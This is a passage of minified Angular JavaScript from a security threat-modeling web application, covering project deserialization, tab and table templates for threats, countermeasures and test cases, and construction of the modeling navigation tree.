tatic FromJSON(a){var e,i,n,r,c,d,T,k,q,Y,te,pe,Re;const Fe=Wu.FromJSON(a.config),Ne=new mf(a.Data,Fe);return a.charSope&&(Ne.charScope=dM.FromJSON(a.charSope,Ne,Fe)),a.objImpact&&(Ne.objImpact=mM.FromJSON(a.objImpact,Ne,Fe)),null===(e=a.assetGroups)||void 0===e||e.forEach(et=>Ne.assetGroups.push(Zl.FromJSON(et,Ne,Fe))),null===(i=a.myData)||void 0===i||i.forEach(et=>Ne.myData.push(Pu.FromJSON(et,Ne,Fe))),null===(n=a.contextElements)||void 0===n||n.forEach(et=>Ne.contextElementMap.set(et.ID,os.FromJSON(et,Ne,Fe))),a.dfdElements.forEach(et=>Ne.dfdElementMap.set(et.ID,lc.FromJSON(et,Ne,Fe))),a.diagrams.forEach(et=>Ne.diagrams.push(ns.FromJSON(et,Ne,Fe))),a.sysContext&&(Ne.sysContext=pT.FromJSON(a.sysContext,Ne,Fe)),null===(r=a.threatActors)||void 0===r||r.forEach(et=>Ne.threatActors.push(Gp.FromJSON(et,Ne,Fe))),a.threatSources&&(Ne.threatSources=uM.FromJSON(a.threatSources,Ne,Fe)),null===(c=a.systemThreats)||void 0===c||c.forEach(et=>Ne.systemThreats.push(hM.FromJSON(et,Ne,Fe))),a.components.forEach(et=>Ne.componentMap.set(et.ID,rf.FromJSON(et,Ne,Fe))),a.stacks.forEach(et=>Ne.stacks.push(Om.FromJSON(et,Ne,Fe))),null===(d=a.attackScenarios)||void 0===d||d.forEach(et=>Ne.attackScenarioMap.set(et.ID,Rc.FromJSON(et,Ne,Fe))),null===(T=a.countermeasures)||void 0===T||T.forEach(et=>Ne.countermeasureMap.set(et.ID,Jl.FromJSON(et,Ne,Fe))),null===(k=a.mitigationProcesses)||void 0===k||k.forEach(et=>Ne.mitigationProcesses.push(Lp.FromJSON(et,Ne,Fe))),null===(q=a.checklists)||void 0===q||q.forEach(et=>Ne.checklists.push(CM.FromJSON(et,Ne,Fe))),null===(Y=a.testCases)||void 0===Y||Y.forEach(et=>Ne.testCases.push($g.FromJSON(et,Ne,Fe))),a.testing&&(Ne.testing=fM.FromJSON(a.testing,Ne,Fe)),null===(te=a.tags)||void 0===te||te.forEach(et=>Ne.myTags.push(pM.FromJSON(et,Ne,Fe))),null===(pe=a.tagCharts)||void 0===pe||pe.forEach(et=>Ne.myTagCharts.push(wT.FromJSON(et,Ne,Fe))),null===(Re=a.exportTemplates)||void 0===Re||Re.forEach(et=>Ne.exportTemplates.push(xT.FromJSON(et,Ne,Fe))),Ne.GetDFDElements().forEach(et=>{if(et instanceof Ys){let ut=et.GetChildren();ut.some(Ze=>null==Ze)&&(console.error("Uncleared reference"),et.Data.childrenIDs=ut.filter(Ze=>Ze).map(Ze=>Ze.ID))}}),Ne}}const rSe=["elementview"];function sSe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"app-container-tree",16,17),he("selectionChanged",function(n){return be(e),Me(V().selectedObject=n)})("filterChanged",function(n){return be(e),Me(V().filteredObject=n)}),u(),s(4,"\n "),Mt()}if(2&t){const e=V();g(2),F("elements",e.GetContainer(e.selectedNode))("selectedElement",e.selectedObject)("filteredElement",e.filteredObject)}}function cSe(t,a){if(1&t){const e=Ye();s(0,"\n "),m(1,"table",21),he("mouseenter",function(){return be(e),Me(V().$implicit.isHovered=!0)})("mouseleave",function(){return be(e),Me(V().$implicit.isHovered=!1)})("dblclick",function(){return be(e),Me(V().$implicit.keepOpen=!0)}),s(2,"\n "),m(3,"tr"),s(4,"\n "),m(5,"td",22)(6,"mat-icon",23),s(7),u()(),s(8,"\n "),m(9,"td",24),s(10),u(),s(11,"\n "),m(12,"td",22)(13,"button",25),he("click",function(){be(e);const n=V().$implicit;return Me(V().RemoveTab(n))}),m(14,"mat-icon",23),s(15),u()()(),s(16,"\n "),u(),s(17,"\n "),m(18,"tr"),s(19,"\n "),m(20,"td",26),s(21),u(),s(22,"\n "),u(),s(23,"\n "),u(),s(24,"\n ")}if(2&t){const e=V().$implicit;g(7),ke(e.nav.icon),g(2),ri("font-style",e.keepOpen?"normal":"italic"),g(1),ke(e.label),g(5),ke(e.isHovered?"close":""),g(5),ri("font-style",e.keepOpen?"normal":"italic"),g(1),ke(e.nav.name())}}function lSe(t,a){if(1&t){const e=Ye();m(0,"app-model-info",37),he("refreshNodes",function(){return be(e),Me(V(3).createNodes())}),u()}}function dSe(t,a){1&t&&it(0,"app-char-scope",38),2&t&&F("charScope",V(2).$implicit.nav.data)}function mSe(t,a){1&t&&it(0,"app-obj-impact",39),2&t&&F("objImpact",V(2).$implicit.nav.data)}function uSe(t,a){1&t&&it(0,"app-threat-sources",40),2&t&&F("threatSources",V(2).$implicit.nav.data)}function hSe(t,a){1&t&&it(0,"app-threat-identification",41)}function fSe(t,a){if(1&t){const e=Ye();m(0,"app-device-assets",42),he("selectionChanged",function(n){return be(e),Me(V(3).selectedObject=n)}),u()}if(2&t){const e=V(2).$implicit,i=V();F("assetGroup",e.nav.data)("selectedObject",i.selectedObject)}}function pSe(t,a){if(1&t){const e=Ye();m(0,"app-diagram",43),he("selectionChanged",function(n){return be(e),Me(V(3).selectedObject=n)})("navTreeChanged",function(){return be(e),Me(V(3).createNodes())}),u()}if(2&t){const e=V(2).$implicit,i=V();F("selectedNode",i.selectedNode)("diagram",e.nav.data)("selectedElement",i.selectedObject)}}function _Se(t,a){if(1&t){const e=Ye();m(0,"app-stack",44,45),he("selectionChanged",function(n){return be(e),Me(V(3).selectedObject=n)}),u()}if(2&t){const e=V(2).$implicit,i=V();F("stack",e.nav.data)("selectedComponent",i.selectedComponent)}}function gSe(t,a){1&t&&it(0,"app-checklist",46),2&t&&F("checklist",V(2).$implicit.nav.data)}function CSe(t,a){1&t&&it(0,"app-testing",47),2&t&&F("testing",V(2).$implicit.nav.data)}function ySe(t,a){if(1&t&&(s(0,"\n "),ne(1,lSe,1,0,"app-model-info",27),s(2,"\n "),ne(3,dSe,1,1,"app-char-scope",28),s(4,"\n "),ne(5,mSe,1,1,"app-obj-impact",29),s(6,"\n "),ne(7,uSe,1,1,"app-threat-sources",30),s(8,"\n "),ne(9,hSe,1,0,"app-threat-identification",31),s(10,"\n "),ne(11,fSe,1,2,"app-device-assets",32),s(12,"\n "),ne(13,pSe,1,3,"app-diagram",33),s(14,"\n "),ne(15,_Se,2,2,"app-stack",34),s(16,"\n "),ne(17,gSe,1,1,"app-checklist",35),s(18,"\n "),ne(19,CSe,1,1,"app-testing",36),s(20,"\n ")),2&t){const e=V().$implicit,i=V();g(1),F("ngIf",i.IsModelInfo(e.nav)),g(2),F("ngIf",i.IsCharScope(e.nav)),g(2),F("ngIf",i.IsObjImpact(e.nav)),g(2),F("ngIf",i.IsThreatSource(e.nav)),g(2),F("ngIf",i.IsThreatIdentification(e.nav)),g(2),F("ngIf",i.IsAssetGroup(e.nav)),g(2),F("ngIf",i.IsDiagram(e.nav)),g(2),F("ngIf",i.IsMyComponentStack(e.nav)),g(2),F("ngIf",i.IsChecklist(e.nav)),g(2),F("ngIf",i.IsTesting(e.nav))}}function bSe(t,a){1&t&&(m(0,"mat-tab",18),s(1,"\n "),ne(2,cSe,25,8,"ng-template",19),s(3,"\n "),ne(4,ySe,21,10,"ng-template",20),s(5,"\n "),u())}function MSe(t,a){if(1&t&&(s(0,"\n "),m(1,"span",53),s(2),oe(3,"translate"),u(),s(4,"\n ")),2&t){const e=V(2);g(1),F("matBadge",e.currentThreatCount)("matBadgeHidden",0==e.currentThreatCount),g(1),ke(re(3,3,"general.AttackScenarios"))}}function vSe(t,a){if(1&t&&(s(0,"\n "),m(1,"span",53),s(2),oe(3,"translate"),u(),s(4,"\n ")),2&t){const e=V(2);g(1),F("matBadge",e.currentCountermeasureCount)("matBadgeHidden",0==e.currentCountermeasureCount),g(1),ke(re(3,3,"general.Countermeasures"))}}function ASe(t,a){if(1&t&&(s(0,"\n "),m(1,"span",53),s(2),oe(3,"translate"),u(),s(4,"\n ")),2&t){const e=V(3);g(1),F("matBadge",e.currentTestCaseCount)("matBadgeHidden",0==e.currentTestCaseCount),g(1),ke(re(3,3,"general.TestCases"))}}function TSe(t,a){if(1&t){const e=Ye();m(0,"mat-tab"),s(1,"\n "),ne(2,ASe,5,5,"ng-template",49),s(3,"\n "),m(4,"app-test-case-table",54),he("selectedObjectChanged",function(n){return be(e),Me(V(2).selectedObject=n)})("testCaseCountChanged",function(n){return be(e),Me(V(2).currentTestCaseCount=n)}),u(),s(5,"\n "),u()}if(2&t){const e=V(2);g(4),F("isActive",2==e.selectedBottomTabGroupIndex)("selectedNode",e.selectedNode)("selectedObject",e.selectedObject)("filteredObject",e.filteredObject)}}function ESe(t,a){if(1&t&&(s(0,"\n "),m(1,"span",53),s(2),oe(3,"translate"),u(),s(4,"\n ")),2&t){const e=V(2);g(1),F("matBadge",e.currentIssueCount)("matBadgeHidden",0==e.currentIssueCount),g(1),ke(re(3,3,"general.Issues"))}}function DSe(t,a){if(1&t){const e=Ye();m(0,"as-split-area",7),s(1,"\n "),m(2,"mat-tab-group",48),he("selectedIndexChange",function(n){return be(e),Me(V().selectedBottomTabGroupIndex=n)}),s(3,"\n "),m(4,"mat-tab"),s(5,"\n "),ne(6,MSe,5,5,"ng-template",49),s(7,"\n "),m(8,"app-threat-table",50),he("selectedObjectChanged",function(n){return be(e),Me(V().selectedObject=n)})("threatCountChanged",function(n){return be(e),Me(V().currentThreatCount=n)}),u(),s(9,"\n "),u(),s(10,"\n "),m(11,"mat-tab"),s(12,"\n "),ne(13,vSe,5,5,"ng-template",49),s(14,"\n "),m(15,"app-countermeasure-table",51),he("selectedObjectChanged",function(n){return be(e),Me(V().selectedObject=n)})("countermeasureCountChanged",function(n){return be(e),Me(V().currentCountermeasureCount=n)}),u(),s(16,"\n "),u(),s(17,"\n "),ne(18,TSe,6,4,"mat-tab",10),s(19,"\n "),m(20,"mat-tab"),s(21,"\n "),ne(22,ESe,5,5,"ng-template",49),s(23,"\n "),m(24,"app-issue-table",52),he("selectedObjectChanged",function(n){return be(e),Me(V().selectedObject=n)})("issueCountChanged",function(n){return be(e),Me(V().currentIssueCount=n)}),u(),s(25,"\n "),u(),s(26,"\n "),u(),s(27,"\n "),u()}if(2&t){const e=V();F("size",e.GetSplitSize(2,1,30))("order",2),g(8),F("isActive",0==e.selectedBottomTabGroupIndex)("selectedNode",e.selectedNode)("selectedObject",e.selectedObject)("filteredObject",e.filteredObject),g(7),F("isActive",1==e.selectedBottomTabGroupIndex)("selectedNode",e.selectedNode)("selectedObject",e.selectedObject)("filteredObject",e.filteredObject),g(3),F("ngIf",e.dataService.Project.HasTesting),g(6),F("isActive",3==e.selectedBottomTabGroupIndex)("selectedNode",e.selectedNode)("selectedObject",e.selectedObject)("filteredObject",e.filteredObject)}}var aa=(()=>{return(t=aa||(aa={})).CharScope="char-scope",t.ObjImpact="obj-impact",t.Context="context",t.UseCase="use-case",t.Assets="asset",t.ThreatSources="threat-sources",t.SystemThreats="system-threats",t.Hardware="hardware",t.Software="software",t.Process="process",t.Dataflow="dataflow",t.Checklist="checklist",aa;var t})();let LG=(()=>{class t extends CT{constructor(e,i,n,r,c,d,T){super(),this.theme=e,this.dataService=i,this.router=n,this.route=r,this.locStorage=c,this.dialog=d,this.translate=T,this._selectedTabIndex=0,this.tabs=[],this.hasBottomTabGroup=!0,this.selectedBottomTabGroupIndex=0,this.currentThreatCount=0,this.currentCountermeasureCount=0,this.currentTestCaseCount=0,this.currentIssueCount=0,this.dataService.Project||this.router.navigate(["/"]),this.router.events.subscribe(k=>{k instanceof Ph&&this.route.queryParams.subscribe(q=>{const Y=pe=>{const Re=xa.FlattenNodes(this.nodes).find(Fe=>Fe.dataType==pe);Re&&this.newTab(Re),this.router.navigate([],{replaceUrl:!0,relativeTo:this.route})},te=pe=>{const Re=xa.FlattenNodes(this.nodes).find(Fe=>{var Ne;return(null===(Ne=Fe.data)||void 0===Ne?void 0:Ne.ID)==pe});Re&&this.newTab(Re),this.router.navigate([],{replaceUrl:!0,relativeTo:this.route})};if(null!=q.tab&&(this.nodes?Y(q.tab):setTimeout(()=>{this.nodes&&Y(q.tab)},500)),null!=q.viewID&&(this.nodes?te(q.viewID):setTimeout(()=>{this.nodes&&te(q.viewID)},500)),null!=q.elementID){let pe=this.dataService.Project.GetDFDElement(q.elementID);pe||(pe=this.dataService.Project.GetComponent(q.elementID)),pe||(pe=this.dataService.Project.GetContextElement(q.elementID)),pe&&setTimeout(()=>{this.selectedObject=pe},100)}})}),this.dataService.ProjectChanged.subscribe(k=>{k&&setTimeout(()=>{this.tabs.forEach(q=>this.RemoveTab(q)),this.createNodes()},10)})}get selectedNode(){var e;return(this.selectedTabIndex<0&&this.tabs.length>0||this.selectedTabIndex>=this.tabs.length&&this.tabs.length>0)&&(console.error("Tab index out of array"),console.log(this.selectedTabIndex,this.tabs.length)),null===(e=this.tabs[this.selectedTabIndex])||void 0===e?void 0:e.nav}set selectedNode(e){setTimeout(()=>{this.hasBottomTabGroup=!e||[aa.Context,aa.UseCase,aa.Hardware,aa.Software,aa.Process,aa.Dataflow].includes(e.dataType),e&&this.newTab(e)},10)}get selectedTabIndex(){return this._selectedTabIndex<0&&this.tabs.length>0&&(this._selectedTabIndex=0),this._selectedTabIndex}set selectedTabIndex(e){this._selectedTabIndex=e,setTimeout(()=>{this.elementView&&this.elementView.RefreshTree()},100)}get selectedObject(){return this._selectedObject}set selectedObject(e){this._selectedObject=e}get filteredObject(){return this._filteredObject}set filteredObject(e){this._filteredObject=e}get selectedComponent(){return this.selectedObject instanceof rf?this.selectedObject:null}ngOnInit(){setTimeout(()=>{this.createNodes()},100)}RemoveTab(e){const i=this.tabs.indexOf(e);if(i>-1){let n=this.tabs.indexOf(e)==this.selectedTabIndex;this.tabs.splice(i,1),n?this.OnTabIndexChange(i>0?i-1:0):ii&&this.tabs[i]&&!this.tabs[i].keepOpen&&setTimeout(()=>{this.RemoveTab(this.tabs[i]),in.nav==e);i&&(i.keepOpen=!0)}GetSplitSize(e,i,n){let r=this.locStorage.Get(si.PAGE_MODELING_SPLIT_SIZE_X+e.toString());return null!=r?Number(JSON.parse(r)[i]):n}OnSplitSizeChange(e,i){this.locStorage.Set(si.PAGE_MODELING_SPLIT_SIZE_X+i.toString(),JSON.stringify(e.sizes))}OnOpenDiagram(e){let i=xa.FindNodeOfObject(e.diagram,this.nodes);i||(this.createNodes(),i=xa.FindNodeOfObject(e.diagram,this.nodes)),i&&this.newTab(i),e.element&&setTimeout(()=>{this.selectedObject=e.element},1e3)}IsCharScope(e){return(null==e?void 0:e.data)instanceof dM}IsObjImpact(e){return(null==e?void 0:e.data)instanceof mM}IsThreatSource(e){return(null==e?void 0:e.data)instanceof uM}IsThreatIdentification(e){return(null==e?void 0:e.dataType)==aa.SystemThreats}IsAssetGroup(e){return(null==e?void 0:e.data)instanceof Zl}IsDiagram(e){return(null==e?void 0:e.data)instanceof ns}IsMyComponentStack(e){return(null==e?void 0:e.data)instanceof Om}IsChecklist(e){return(null==e?void 0:e.data)instanceof CM}IsModelInfo(e){return(null==e?void 0:e.data)instanceof mf}IsTesting(e){return(null==e?void 0:e.data)instanceof fM}GetContainer(e){var i;if(e){if(this.isContainer(e.data))return e.data;if(this.isContainer(null===(i=e.data)||void 0===i?void 0:i.Elements))return e.data.Elements}}IsContainer(e){return null!=this.GetContainer(e)}isContainer(e){return e&&e.GetChildren&&"function"==typeof e.GetChildren}newTab(e){var i;let n=this.tabs.find(r=>{var c,d;return(null===(c=r.nav.data)||void 0===c?void 0:c.ID)==(null===(d=e.data)||void 0===d?void 0:d.ID)});if(n)this.OnTabIndexChange(this.tabs.indexOf(n));else{let r=null===(i=this.findParent(e,this.nodes))||void 0===i?void 0:i.name();r||(r=this.dataService.Project.Name),this.tabs.push({label:r,keepOpen:!1,nav:e}),setTimeout(()=>{this.OnTabIndexChange(this.tabs.length-1)},100)}}findParent(e,i){for(let n=0;n{let yt={name:()=>Ze.Name,icon:"fact_check",iconAlignLeft:!0,canSelect:!0,data:Ze,dataType:aa.Checklist,canRename:!0,onRename:It=>{Ze.Name=It},canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(Ze).subscribe(It=>{if(It){this.dataService.Project.DeleteChecklist(Ze),this.selectedNode==yt&&(this.selectedNode=null);let St=this.tabs.find(Nt=>Nt.nav.data.ID==Ze.ID);St&&this.RemoveTab(St),this.createNodes()}})}};return yt},k=(Ze,yt)=>{let It={name:()=>Ze.Name,canSelect:!1,data:Ze,canRename:!0,onRename:Nt=>{Ze.Name=Nt},canAdd:!0,addOptions:[],onAdd:Nt=>{if("Assets"==Nt){let oi=d.InitializeNewAssetGroup(d.Config);Ze.Data.assetGroupID=oi.ID,this.createNodes(),this.selectedNode=xa.FindNodeOfObject(oi,this.nodes)}else if("Software"==Nt){let oi=Ze.CreateSoftwareStack();this.createNodes(),this.selectedNode=xa.FindNodeOfObject(oi,this.nodes)}else if("Process"==Nt){let oi=Ze.CreateProcessStack();this.createNodes(),this.selectedNode=xa.FindNodeOfObject(oi,this.nodes)}else{let oi=this.dataService.Config.GetChecklistTypes().find(Ai=>Ai.Name==Nt.replace(this.translate.instant("general.Checklist")+": ",""));if(oi){let Ai=this.dataService.Project.CreateChecklist(Ze,oi);this.createNodes();const vi=xa.FindNodeOfObject(Ai,this.nodes);this.selectedNode=vi,vi.isRenaming=!0}}},canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(Ze).subscribe(Nt=>{if(Nt){this.dataService.Project.DeleteContextElement(Ze),this.selectedNode==It&&(this.selectedNode=null);let oi=this.tabs.find(Ai=>{var vi;return(null===(vi=Ai.nav.data)||void 0===vi?void 0:vi.ID)==Ze.ID});oi&&this.RemoveTab(oi),this.createNodes()}})},canDuplicate:!1,canMoveUpDown:!0,onMoveUp:()=>{let Nt=this.dataService.Project.GetContextElements(),oi=yt.children.map(vi=>vi.data),Ai=oi.findIndex(vi=>vi.ID==Ze.ID);if(0!=Ai){let vi=Nt.findIndex(xi=>xi.ID==oi[Ai-1].ID);this.dataService.Project.MoveItemInContextElements(Nt.findIndex(xi=>xi.ID==Ze.ID),vi),yt.children.splice(Ai,0,yt.children.splice(Ai-1,1)[0])}},onMoveDown:()=>{let Nt=this.dataService.Project.GetContextElements(),oi=yt.children.map(vi=>vi.data),Ai=oi.findIndex(vi=>vi.ID==Ze.ID);if(Ai!=oi.length-1){let vi=Nt.findIndex(xi=>xi.ID==oi[Ai+1].ID);this.dataService.Project.MoveItemInContextElements(Nt.findIndex(xi=>xi.ID==Ze.ID),vi),yt.children.splice(Ai,0,yt.children.splice(Ai+1,1)[0])}},children:[]};return Ze.AssetGroup?It.children.push({name:()=>"Assets",icon:Zl.Icon,iconAlignLeft:!0,canSelect:!0,data:Ze.AssetGroup,dataType:aa.Assets,canDelete:!0,onDelete:()=>{let oi=Ze.AssetGroup;this.dialog.OpenDeleteObjectDialog(oi).subscribe(Ai=>{if(Ai){let vi=xa.FindNodeOfObject(oi,this.nodes);this.dataService.Project.DeleteAssetGroup(oi),this.selectedNode==vi&&(this.selectedNode=null);let xi=this.tabs.find(Za=>Za.nav.data.ID==oi.ID);xi&&this.RemoveTab(xi),this.createNodes()}})}}):It.addOptions.push("Assets"),It.children.push({name:()=>"Hardware",icon:"developer_board",iconAlignLeft:!0,canSelect:!0,data:Ze.HardwareDiagram,dataType:aa.Hardware,canRename:!1,canDelete:!1,canDuplicate:!1}),Ze.SoftwareStack?It.children.push({name:()=>"Software",icon:"code",iconAlignLeft:!0,canSelect:!0,data:Ze.SoftwareStack,dataType:aa.Software,canRename:!1,canDelete:!0,onDelete:()=>{let oi=Ze.SoftwareStack;this.dialog.OpenDeleteObjectDialog(oi).subscribe(Ai=>{if(Ai){let vi=xa.FindNodeOfObject(oi,this.nodes);Ze.DeleteSoftwareStack(),this.selectedNode==vi&&(this.selectedNode=null);let xi=this.tabs.find(Za=>Za.nav.data.ID==oi.ID);xi&&this.RemoveTab(xi),this.createNodes()}})}}):It.addOptions.push("Software"),Ze.ProcessStack?It.children.push({name:()=>"Process",icon:"policy",iconAlignLeft:!0,canSelect:!0,data:Ze.ProcessStack,dataType:aa.Process,canRename:!1,canDelete:!0,onDelete:()=>{let oi=Ze.ProcessStack;this.dialog.OpenDeleteObjectDialog(oi).subscribe(Ai=>{if(Ai){let vi=xa.FindNodeOfObject(oi,this.nodes);Ze.DeleteProcessStack(),this.selectedNode==vi&&(this.selectedNode=null);let xi=this.tabs.find(Za=>Za.nav.data.ID==oi.ID);xi&&this.RemoveTab(xi),this.createNodes()}})}}):It.addOptions.push("Process"),It.addOptions.push(...this.dataService.Config.GetChecklistTypes().map(Nt=>this.translate.instant("general.Checklist")+": "+Nt.Name)),Ze.Checklists.forEach(Nt=>It.children.push(T(Nt))),It},q=(Ze,yt)=>{let It={name:()=>Ze.Name,canSelect:!1,data:Ze,canRename:!0,onRename:St=>{Ze.Name=St},canAdd:!0,addOptions:[],onAdd:St=>{if("Assets"==St){let Nt=d.InitializeNewAssetGroup(d.Config);Ze.Data.assetGroupID=Nt.ID,this.createNodes(),this.selectedNode=xa.FindNodeOfObject(Nt,this.nodes)}else if("Software"==St){let Nt=Ze.CreateSoftwareStack();this.createNodes(),this.selectedNode=xa.FindNodeOfObject(Nt,this.nodes)}else if("Process"==St){let Nt=Ze.CreateProcessStack();this.createNodes(),this.selectedNode=xa.FindNodeOfObject(Nt,this.nodes)}else{let Nt=this.dataService.Config.GetChecklistTypes().find(oi=>oi.Name==St.replace("Checklist: ",""));if(Nt){let oi=this.dataService.Project.CreateChecklist(Ze,Nt);this.createNodes();const Ai=xa.FindNodeOfObject(oi,this.nodes);this.selectedNode=Ai,Ai.isRenaming=!0}}},canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(Ze).subscribe(St=>{if(St){this.dataService.Project.DeleteContextElement(Ze),this.selectedNode==It&&(this.selectedNode=null);let Nt=this.tabs.find(oi=>{var Ai;return(null===(Ai=oi.nav.data)||void 0===Ai?void 0:Ai.ID)==Ze.ID});Nt&&this.RemoveTab(Nt),this.createNodes()}})},canDuplicate:!1,canMoveUpDown:!0,onMoveUp:()=>{let St=this.dataService.Project.GetContextElements(),Nt=yt.children.map(Ai=>Ai.data),oi=Nt.findIndex(Ai=>Ai.ID==Ze.ID);if(0!=oi){let Ai=St.findIndex(vi=>vi.ID==Nt[oi-1].ID);this.dataService.Project.MoveItemInContextElements(St.findIndex(vi=>vi.ID==Ze.ID),Ai),yt.children.splice(oi,0,yt.children.splice(oi-1,1)[0])}},onMoveDown:()=>{let St=this.dataService.Project.GetContextElements(),Nt=yt.children.map(Ai=>Ai.data),oi=Nt.findIndex(Ai=>Ai.ID==Ze.ID);if(oi!=Nt.length-1){let Ai=St.findIndex(vi=>vi.ID==Nt[oi+1].ID);this.dataService.Project.MoveItemInContextElements(St.findIndex(vi=>vi.ID==Ze.ID),Ai),yt.children.splice(oi,0,yt.children.splice(oi+1,1)[0])}},children:[]};return Ze.AssetGroup?It.children.push({name:()=>"Assets",icon:Zl.Icon,iconAlignLeft:!0,canSelect:!0,data:Ze.AssetGroup,dataType:aa.Assets,canDelete:!0,onDelete:()=>{let Nt=Ze.AssetGroup;this.dialog.OpenDeleteObjectDialog(Nt).subscribe(oi=>{if(oi){let Ai=xa.FindNodeOfObject(Nt,this.nodes);this.dataService.Project.DeleteAssetGroup(Nt),this.selectedNode==Ai&&(this.selectedNode=null);let vi=this.tabs.find(xi=>xi.nav.data.ID==Nt.ID);vi&&this.RemoveTab(vi),this.createNodes()}})}}):It.addOptions.push("Assets"),Ze.SoftwareStack?It.children.push({name:()=>"Software",icon:"code",iconAlignLeft:!0,canSelect:!0,data:Ze.SoftwareStack,dataType:aa.Software,canRename:!1,canDelete:!0,onDelete:()=>{let Nt=Ze.SoftwareStack;this.dialog.OpenDeleteObjectDialog(Nt).subscribe(oi=>{if(oi){let Ai=xa.FindNodeOfObject(Nt,this.nodes);Ze.DeleteSoftwareStack(),this.selectedNode==Ai&&(this.selectedNode=null);let vi=this.tabs.find(xi=>xi.nav.data.ID==Nt.ID);vi&&this.RemoveTab(vi),this.createNodes()}})}}):It.addOptions.push("Software"),Ze.ProcessStack?It.children.push({name:()=>"Process",icon:"policy",iconAlignLeft:!0,canSelect:!0,data:Ze.ProcessStack,dataType:aa.Process,canRename:!1,canDelete:!0,onDelete:()=>{let Nt=Ze.ProcessStack;this.dialog.OpenDeleteObjectDialog(Nt).subscribe(oi=>{if(oi){let Ai=xa.FindNodeOfObject(Nt,this.nodes);Ze.DeleteProcessStack(),this.selectedNode==Ai&&(this.selectedNode=null);let vi=this.tabs.find(xi=>xi.nav.data.ID==Nt.ID);vi&&this.RemoveTab(vi),this.createNodes()}})}}):It.addOptions.push("Process"),It.addOptions.push(...this.dataService.Config.GetChecklistTypes().map(St=>"Checklist: "+St.Name)),Ze.Checklists.forEach(St=>It.children.push(T(St))),It},Y=(Ze,yt)=>{let It={name:()=>Ze.Name,icon:"account_tree",iconAlignLeft:!0,canSelect:!0,data:Ze,dataType:aa.Dataflow,canRename:!0,onRename:St=>{Ze.Name=St},canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(Ze).subscribe(St=>{if(St){this.dataService.Project.DeleteDiagram(Ze),this.selectedNode==It&&(this.selectedNode=null);let Nt=this.tabs.find(oi=>oi.nav.data.ID==Ze.ID);Nt&&this.RemoveTab(Nt),this.createNodes()}})},canDuplicate:!1,canMoveUpDown:!0,onMoveUp:()=>{let St=this.dataService.Project.GetDiagrams(),Nt=yt.children.map(Ai=>Ai.data),oi=Nt.findIndex(Ai=>Ai.ID==Ze.ID);if(0!=oi){let Ai=St.findIndex(vi=>vi.ID==Nt[oi-1].ID);St.splice(Ai,0,St.splice(St.findIndex(vi=>vi.ID==Ze.ID),1)[0]),yt.children.splice(oi,0,yt.children.splice(oi-1,1)[0])}},onMoveDown:()=>{let St=this.dataService.Project.GetDiagrams(),Nt=yt.children.map(Ai=>Ai.data),oi=Nt.findIndex(Ai=>Ai.ID==Ze.ID);if(oi!=Nt.length-1){let Ai=St.findIndex(vi=>vi.ID==Nt[oi+1].ID);St.splice(Ai,0,St.splice(St.findIndex(vi=>vi.ID==Ze.ID),1)[0]),yt.children.splice(oi,0,yt.children.splice(oi+1,1)[0])}}};return It},te={name:()=>this.translate.instant("dialog.modelinfo.title"),icon:"source",iconAlignLeft:!1,canSelect:!0,data:this.dataService.Project},pe={name:()=>this.translate.instant("pages.modeling.analysis"),icon:"create",iconAlignLeft:!1,canSelect:!1,children:[{name:()=>"Characterization & Scope",nameExtension:"(opt)",tooltipExtension:this.translate.instant("pages.modeling.optionalStep"),canSelect:!0,iconAlignLeft:!0,icon:"edit_note",data:d.GetCharScope(),dataType:aa.CharScope},{name:()=>"Business Objectives & Impact",nameExtension:"(opt)",tooltipExtension:this.translate.instant("pages.modeling.optionalStep"),canSelect:!0,iconAlignLeft:!0,icon:"outlined_flag",data:d.GetObjImpact(),dataType:aa.ObjImpact},{name:()=>"System Interaction",nameExtension:"(opt)",tooltipExtension:this.translate.instant("pages.modeling.optionalStep"),canSelect:!0,iconAlignLeft:!0,icon:"signpost",data:null===(i=d.GetSysContext())||void 0===i?void 0:i.ContextDiagram,dataType:aa.Context},{name:()=>"Use Cases",nameExtension:"(opt)",tooltipExtension:this.translate.instant("pages.modeling.optionalStep"),canSelect:!0,iconAlignLeft:!0,icon:"explore",data:null===(n=d.GetSysContext())||void 0===n?void 0:n.UseCaseDiagram,dataType:aa.UseCase},{name:()=>"Assets",nameExtension:"(opt*)",tooltipExtension:this.translate.instant("pages.modeling.optionalAsset"),canSelect:!0,iconAlignLeft:!0,icon:Zl.Icon,data:d.GetProjectAssetGroup(),dataType:aa.Assets,canDelete:!0,onDelete:()=>{let Ze=d.GetProjectAssetGroup();this.dialog.OpenDeleteObjectDialog(Ze).subscribe(yt=>{if(yt){let It=xa.FindNodeOfObject(Ze,this.nodes);this.dataService.Project.DeleteAssetGroup(Ze),this.selectedNode==It&&(this.selectedNode=null);let St=this.tabs.find(Nt=>Nt.nav.data.ID==Ze.ID);St&&this.RemoveTab(St),this.createNodes()}})}},{name:()=>"Threat Sources",nameExtension:"(opt)",tooltipExtension:this.translate.instant("pages.modeling.optionalStep"),canSelect:!0,iconAlignLeft:!0,icon:"portrait",data:d.GetThreatSources(),dataType:aa.ThreatSources},{name:()=>"Threat Identification",canSelect:!0,iconAlignLeft:!0,icon:"flash_on",dataType:aa.SystemThreats}]},Re=pe.children.findIndex(Ze=>Ze.dataType==aa.Assets);null==pe.children[Re].data&&(pe.children.splice(Re,1),pe.canAdd=!0,pe.addOptions=["Assets"],pe.onAdd=()=>{let Ze=d.InitializeNewAssetGroup(d.Config);d.Data.projectAssetGroupId=Ze.ID,this.createNodes(),this.selectedNode=xa.FindNodeOfObject(Ze,this.nodes)});const Fe={name:()=>this.translate.instant("pages.modeling.devices"),icon:Ou.Icon,iconAlignLeft:!1,canSelect:!1,canAdd:!0,onAdd:()=>{this.dataService.Project.CreateDevice(),this.createNodes()},children:[]},Ne={name:()=>this.translate.instant("pages.modeling.apps"),icon:cf.Icon,iconAlignLeft:!1,canSelect:!1,isExpanded:!1,canAdd:!0,onAdd:()=>{this.dataService.Project.CreateMobileApp(),this.createNodes()},children:[]},et={name:()=>this.translate.instant("pages.modeling.useCaseDFDs"),icon:"account_tree",iconAlignLeft:!1,canSelect:!1,canAdd:!0,onAdd:()=>{let Ze=this.dataService.Project.CreateDiagram(xn.DataFlow);this.createNodes();const 